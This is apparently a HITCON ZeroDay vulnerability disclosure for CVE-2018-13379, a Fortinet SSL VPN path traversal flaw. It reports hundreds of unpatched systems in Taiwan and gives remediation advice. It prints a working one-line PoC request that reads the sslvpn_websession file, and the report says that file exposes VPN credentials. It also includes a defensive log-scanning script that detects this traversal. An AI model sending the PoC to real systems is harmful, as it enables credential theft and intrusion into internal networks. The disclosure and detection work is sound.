Multiple organizations: Fortinet FortiWeb sslvpn_websession path traversal vulnerability CVE-2018-13379 - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2022-00515
  • Notified vendor: Multiple organizations
  • Title: Multiple organizations: Fortinet FortiWeb sslvpn_websession path traversal vulnerability CVE-2018-13379
  • Introduction: sslvpn_websession path traversal vulnerability CVE-2018-13379

Processing status

Current status

Public
Last Update : 2022/09/21
  • New submission
  • Reviewed
  • Reported
  • Patch status not reported
  • Not retested
  • Public

Processing history

  • 2022/07/21 12:10:44 : New submission (status updated by 好男人)
  • 2022/07/23 23:59:07 : Review completed (status updated by the HITCON ZeroDay service team)
  • 2022/07/24 11:58:50 : Patch in progress (status updated by the HITCON ZeroDay service team)
  • 2022/09/20 03:00:02 : Public (updated automatically by the HITCON ZeroDay platform)
  • 2022/09/21 14:55:32 : Public (status updated by the HITCON ZeroDay service team)

Details

  • ZDID: ZD-2022-00515
  • Reporter: qekuxpre (好男人)
  • Risk: Critical
  • Type: Local File Inclusion (LFI)

References

An attacker can use this vulnerability to obtain sensitive data such as backend system files and the website's program source code.

Vulnerability description: OWASP - Testing for Local File Inclusion
https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion

Wikipedia vulnerability description:
https://en.wikipedia.org/wiki/File_inclusion_vulnerability

OWASP Top 10 2007 - Malicious File Execution
https://www.owasp.org/index.php/Top_10_2007-Malicious_File_Execution
(The information in this field is generated automatically by the system based on the vulnerability category, as reference material for the vulnerability.)

Related URLs


Description

A search of the Taiwan region found nearly 9672 Fortinet FortiWeb sslvpn systems. Testing them against CVE-2018-13379 found roughly 645 systems that are still vulnerable; two years after disclosure, nearly 6% of these systems have still not patched this vulnerability. The vulnerability can be verified with the PoC below. On a vulnerable system the VPN users' account names and passwords can be read directly, the obtained credentials can be used to log in to the backend, and the VPN can then be used to explore the internal network.

<target URL>/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
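As an added defender-side example (not part of the original report), the Python below parses constructed web-server access-log lines and flags requests to /remote/fgt_lang whose `lang` parameter resolves outside the language-file directory, as the PoC path above does. The combined-style log format, the `LANG_DIR` base directory and the sample lines are assumptions made for the example.

```python
# Added example, not code from the original report. Flags CVE-2018-13379-style requests:
# /remote/fgt_lang with a `lang` value that escapes its directory (e.g. toward sslvpn_websession).
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (combined-style); addresses are documentation ranges.
SAMPLE_LOG = """\
203.0.113.10 - - [21/Jul/2022:12:10:44 +0800] "GET /remote/fgt_lang?lang=en HTTP/1.1" 200 512
203.0.113.10 - - [21/Jul/2022:12:10:45 +0800] "GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1" 200 8192
198.51.100.7 - - [21/Jul/2022:12:11:02 +0800] "GET /remote/login?lang=en HTTP/1.1" 200 1024
198.51.100.7 - - [21/Jul/2022:12:11:09 +0800] "GET /remote/fgt_lang?lang=%2F..%2F..%2Fdev%2Fcmdb%2Fsslvpn_websession HTTP/1.1" 200 8192
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

LANG_DIR = "/lang"              # assumed base directory for language files (illustrative only)
WATCHED_PATH = "/remote/fgt_lang"
SENSITIVE_FILE = "sslvpn_websession"


def resolve_lang(lang_value: str) -> str:
    """Resolve the (already percent-decoded) lang value against LANG_DIR.
    posixpath.join drops LANG_DIR when the value is absolute, and normpath collapses
    repeated slashes and '..' components, so the result is the path the server would open."""
    return posixpath.normpath(posixpath.join(LANG_DIR, lang_value))


def lang_escapes(lang_value: str) -> bool:
    """True when the resolved path lies outside LANG_DIR."""
    resolved = resolve_lang(lang_value)
    return not (resolved == LANG_DIR or resolved.startswith(LANG_DIR + "/"))


def find_traversal_requests(log_text: str) -> list:
    """Return one finding per request to WATCHED_PATH whose lang parameter escapes LANG_DIR."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # not a request line we understand; skip
        parts = urlsplit(m.group("target"))
        if parts.path != WATCHED_PATH:
            continue
        # parse_qs percent-decodes each value once, so %2F becomes '/'.
        for lang in parse_qs(parts.query, keep_blank_values=True).get("lang", []):
            if lang_escapes(lang):
                resolved = resolve_lang(lang)
                findings.append({
                    "src": m.group("src"),
                    "ts": m.group("ts"),
                    "status": int(m.group("status")),
                    "resolved": resolved,
                    "sensitive": resolved.endswith("/" + SENSITIVE_FILE),
                })
    return findings


if __name__ == "__main__":
    for f in find_traversal_requests(SAMPLE_LOG):
        print(f)
```

A 200 status with a large response body on a flagged line is the case to treat as a probable successful read rather than a blocked probe.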

Images

Remediation advice

Fortinet PSIRT advisory FG-IR-18-384 [4][5] provides information on handling this vulnerability and the appropriate security updates for the different software versions; users should upgrade to the corresponding version as soon as possible to fix this vulnerability.

Reference links:

[1] https://twitter.com/Bank_Security/status/1329426020647243778

[2] https://www.bleepingcomputer.com/news/security/hacker-posts-exploits-for-over-49-000-vulnerable-fortinet-vpns/

[3] https://us-cert.cisa.gov/ncas/current-activity/2020/11/27/fortinet-fortios-system-file-leak

[4] https://www.fortiguard.com/psirt/FG-IR-18-384

[5] /my_url/en/alert/19100802

Screenshots
